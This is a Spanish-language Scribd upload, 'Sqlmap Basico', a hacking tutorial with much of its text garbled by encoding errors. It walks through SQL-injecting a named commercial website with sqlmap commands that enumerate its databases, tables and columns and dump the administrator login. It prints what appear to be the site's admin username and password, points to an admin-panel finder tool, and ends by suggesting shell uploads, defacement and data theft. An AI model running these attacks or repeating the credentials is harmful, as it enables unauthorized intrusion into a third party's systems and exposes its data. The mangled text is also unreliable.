Scribd Logo
Cargar

¡Te damos la bienvenida a Scribd!

  • Sqlmap Basico

    Cargado por

    Jonathan Posada
    12 vistas9 páginas

    Título original

    sqlmap-basico

    Derechos de autor

    © Attribution Non-Commercial (BY-NC)

    Formatos disponibles

    PDF, TXT o lea en línea desde Scribd

    ¿Le pareció útil este documento?

    ¿Este contenido es inapropiado?

    Denunciar este documento

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Descargue como PDF, TXT o lea en línea desde Scribd
    Marcar por contenido inapropiado
    12 vistas9 páginas

    Sqlmap Basico

    Cargado por

    Jonathan Posada

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Descargue como PDF, TXT o lea en línea desde Scribd
    Marcar por contenido inapropiado
    de 9

    REALIZAR UNA INYECCIN SQL CON SQLMAP BY MANTROX

    Saludos a tod@s quienes estn interesad@s en aprender a realizar una inyeccin mysql desde consola con la herramienta de penetracin 'sqlmap', yo trabajar en Backtrack 5 ya que es mi sistema operati o, pero ustedes podrn realizarlo en !indo"s o en otras distro de #nu$%inu&, sin ms prembulos iniciamos' (Suponiendo que ustedes ya lo tienen instalado en su S)*, + erdad, &-. /i tar0et http1$$chica0odeportes)com$2roductos)php,cate0oria345 Si tambin ests trabajando en Backtrack, el comando para localizarlo desde consola es' root@bt:~#cd /pentest/database/sqlmap enter. 6endremos un pantallazo as7'

    %ue0o de estar en el directorio de Sql/ap procedemos a penetrar la "eb mysql'

    ulnerable a

    8n mi caso' pentest/database/sqlmap# ./sqlmap.py -u http://chicagodeportes.com/Productos.php? categoria=1 --dbs !nter. 6endremos un pantallazo as7'

    %ue0o de tener la 'databases (en este caso 9.' empezaremos a buscar los datos para lo00erarnos, buscar el :ser y la 2ass de acceso a la administracin de la "eb, e&trayendo las tablas de el 'cajn' que escojamos, cada "eb trae m7nimo 9 'cajones', una ser 'in;ormation<shema' y la otra aria dependiendo de la "eb que penetres (en mi caso chica0od<deporte., para proceder con el comando' /pentest/database/sqlmap#./sqlmap.py -u http://chicagodeportes.com/Productos.php? categoria=1 -" chicagod#deporte --tables

    6endremos un pantallazo as7'

    =a teniendo las tablas del 'cajn' penetrado, procedemos a tratar de buscar al0una re;erencia para encontrar los datos del lo0in, por ejemplo, '>dmin<lo0in' ? '>dministrador' ? '>dministrator' ? '>dmin' ? ':ser<>dmin', etctera, en mi caso '>dmin%o0in', cuando ya ten0amos esto, amos a e&traer las columnas de esta tabla donde estn los datos interesantes &-, procedemos con el si0uiente comando' ./sqlmap.py -u http://chicagodeportes.com/Productos.php?categoria=1 chicagod#deporte -$ %dmin&ogin --columns 6endremos un pantallazo as7' -"

    @uando ya estamos dentro de las columnas de la tabla donde estn los datos, amos a e&plotar, a realizar el dump de la columna necesaria, por ejemplo, la columna sea, 'nombredeusuario' ? 'user' ? 'admin<user', etctera, en mi caso es '>dm<:suario y en la contraseAa puede ser 'pass"ord' ? 'contraseAa' ? 'pass', etctera, en mi caso es >dm<@la e, con el si0uiente comando e&plotamos' )$sqlmap)py Bu http1$$chica0odeportes)com$2roductos)php,cate0oria345 chica0od<deporte B6 >dmin%o0in B@ >dm<:suario BBdump B-

    Cos pre0untar el mtodo de e&plotacin, pondremos el de;ault, ser7a la opcin '4', tecleamos, '4' y lue0o enter) @abe anotar que depronto muchas eces nos encontremos con contraseAas encriptadas, ya sea en md5, mdD, sha4, etctera, para esto podemos usar arios desencriptadores online o mediante ataques de diccionarios, que en mi caso me brinda Backtrack, (en caso de que los desencriptarores online no ;uncionen)

    6endremos estos pantallazos' B >c donde ponemos la opcin nEmero 4)

    >c donde tenemos la columna e&plotada, en este caso '>dm<:suario''

    >c donde tenemos la columna e&plotada, en este caso '>dm<@la e''

    %isto, ya tenemos los datos que necesitamos para entrar al rea de administracin' 'suario: (ontrase)a1 chic>0oFGH%I6495JertyKL>495 M#B65HHDN&d42*60hkl4HHOGFFOmjhdKLK-K

    %o Enico que nos ;alta es encontrar el panel de administracin del tar0et, para esto usaremos una herramienta en perl para manejarla desde consola si ests en Back6rack o en otra distro de #nu$%inu&, si ests en !indo"s puedes descar0ar el Ma ij, ya que trae una ;uncin para encontrar paneles de adminstracin de las "eb's, ac les dejo el link de descar0a de '2anel >dmin'' http://mantroxtools.tuars.com/ Encontrar el Panel de administrador de una web desde consola en Backtrack/ panel.admin.pl clic derecho, guardar cmo, y lo guardan en root. #uardado el archi o en 'root', abren una consola, (@trl P >lt P t. y ejecutas el '2anel >dmin' con el comando' root@bt1QR perl panel)admin)pl

    6endremos un pantallazo as7'

    8n '3S' pondremos la "eb que inyectamos, en mi caso http1$$chica0odeportes)com y lue0o 'enter') 6endremos un pantallazo as7'

    8stamos penetrando bajo la ulnerabilidad 'mysql', por ende es 'php', osea la opcin nEmero '4' y lue0o enter) 6endremos un pantallazo as7'

    @omienza la busqueda del panel, cuando lo encuentre nos arrojar, (en mi caso.) TBU Iound http1$$chica0odeportes)com$>dmin$%o0in)php %isto, ya tenemos todo para entrar y realizar lo que queramos, ya sea subir shell, realizar un de;ace, e&traer datos, modi;icar in;ormacin, cambiar la pass"ord, etctera) 8sto ;ue todo, espero que hayan entendido, saludos a todos y todas, y no ol iden darle 'like' a mi ;anpa0e de ;acebook, 'https1$$""");acebook)com$-ocumentacionMackin0')

    'La seguridad informtica es tan solo un mito'

    https://www.facebook.com/Root.Dark.Team

    También podría gustarte